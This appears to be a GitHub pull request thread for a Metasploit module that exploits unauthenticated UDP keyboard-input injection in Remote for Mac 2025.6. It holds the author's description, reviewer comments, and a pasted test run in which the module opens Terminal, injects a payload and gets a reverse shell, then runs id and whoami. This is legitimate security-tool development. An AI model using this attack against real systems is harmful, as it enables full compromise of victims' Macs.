Adds UDP Keyboard RCE for Remote for Mac 2025.6

[blue0x1]

Remote for Mac 2025.6 UDP Keyboard Input RCE Module

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6. The vulnerability allows attackers to send crafted UDP packets that simulate keyboard input, bypassing authentication when the "Allow unknown devices" feature is enabled.

The module sends a sequence of UDP packets to open the Terminal app and then injects a payload command to execute arbitrary code on the target system. The target UDP port must be specified in the RPORT option, as it may vary depending on the target’s configuration.

Successful exploitation results in full remote code execution under the privileges of the Remote for Mac application, potentially leading to full system compromise.

Notes:

The vulnerability is only exploitable if authentication is disabled and "Allow unknown devices" is enabled.

The UDP port should be confirmed for each target environment.

Reverse shell payloads are supported, facilitating remote control.

References:
https://packetstorm.news/files/id/196351/

[msutovsky-r7]

Would you mind adding docs here as well?

[msutovsky-r7]

Isn't this file part of this PR? I don't think this should be here, unless you want to submit both modules together - in that case, the best approach would be to close the previous PR and add documentation to this PR as well.

[msutovsky-r7]

Why is this empty? I don't think this has to be here.

[msutovsky-r7]

SSL is already registered options afaik

[msutovsky-r7]

The send_request_cgi has already in its options SSL, so no need to specify it like this.

[msutovsky-r7]

I'm not sure if this should be here

[msutovsky-r7]

Using res.get_json_document would simplify greatly the logic of this part

[msutovsky-r7]

Are you sending the UDP request to the same host/port as for TCP HTTP request?

[blue0x1]

Yes it’s the same port

[msutovsky-r7]

You can use include Msf::Exploit::Remote::Udp to simplify some of this

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[msutovsky-r7]

Hi @blue0x1 , just checking in! If you need help with requested changes for this PR, let me know.

[msutovsky-r7]

Would you mind adding check method here?

[msutovsky-r7]

msf6 exploit(osx/misc/remote_for_mac) > run verbose=true
[*] Started reverse TCP handler on 192.168.168.140:4444 
[*] Checking authentication on https://192.168.168.175:49158/api/getVersion
[+] Authentication is disabled. Target is vulnerable.
[*] Simulating system keyboard input to open Terminal...
[*] Sending malicious payload to be executed...
[+] Payload sent. Awaiting session...
[*] Command shell session 1 opened (192.168.168.140:4444 -> 192.168.168.175:49161) at 2025-06-11 04:23:20 -0400

i
zsh: command not found: i
id
uid=501(ms) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
whoami
ms